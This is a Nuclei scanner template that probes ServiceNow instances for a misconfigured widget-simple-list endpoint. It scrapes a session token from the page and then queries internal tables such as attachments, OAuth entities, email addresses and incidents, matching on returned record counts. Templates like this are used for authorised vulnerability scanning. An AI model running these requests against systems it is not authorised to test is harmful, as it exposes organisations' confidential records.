nuclei-templates/http/misconfiguration/servicenow-widget-misconfig.yaml

id: servicenow-widget-misconfig

info:
  name: ServiceNow Widget-Simple-List - Misconfiguration
  author: DhiyaneshDk
  severity: unknown
  reference:
    - https://github.com/bsysop/servicenow
    - https://twitter.com/ConspiracyProof/status/1713270026046685272
    - https://www.enumerated.ie/servicenow-data-exposure
  metadata:
    verified: true
    max-request: 54
    shodan-query: title:"servicenow"
  tags: servicenow,widget,misconfig

http:
  - raw:
      - |
        @once
        GET / HTTP/1.1
        Host: {{Hostname}}        
      - |
        @once
        GET /login.do HTTP/1.1
        Host: {{Hostname}}        
      - |
        POST /api/now/sp/widget/widget-simple-list?{{table_list}} HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-UserToken: {{user-token}}
        Content-Type: application/json

        {}        

    payloads:
      table_list:
        - t=kb_knowledge&f=text
        - t=cmdb_model&f=name
        - t=cmn_department&f=app_name
        - t=licensable_app&f=app_name
        - t=alm_asset&f=display_name
        - t=sys_attachment&f=file_name
        - t=sys_attachment_doc&f=data
        - t=oauth_entity&f=name
        - t=cmn_cost_center&f=name
        - t=cmdb_model&f=name
        - t=sc_cat_item&f=name
        - t=sn_admin_center_application&f-name
        - t=cmn_company&f=name
        - t=sys_email_attachment&f=email
        - t=sys_email_attachment&f=attachment
        - t=cmn_notif_device&f=email_address
        - t=sys_portal_age&f=display_name
        - t=incident&f=short_description

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"isValid":true'
          - '"count":'
        condition: and

      - type: regex
        part: body
        regex:
          - '"display_value":"(.*)",'

    extractors:
      - type: regex
        name: user-token
        group: 1
        regex:
          - var g_ck = '([0-9a-z]+)'
        internal: true

      - type: regex
        part: body
        group: 1
        regex:
          - '"count":([0-9]+),'

# digest: 4a0a0047304502202a6cd55766986fb7077ff3d1fa0acf790f1e71de0d403bee0981c3ede12711fc0221009919ff8cc46a4bbffbd550f5fe4809866ddd8e33800028982c6a53addd330860:922c64590222798bb761d5b6d8e72950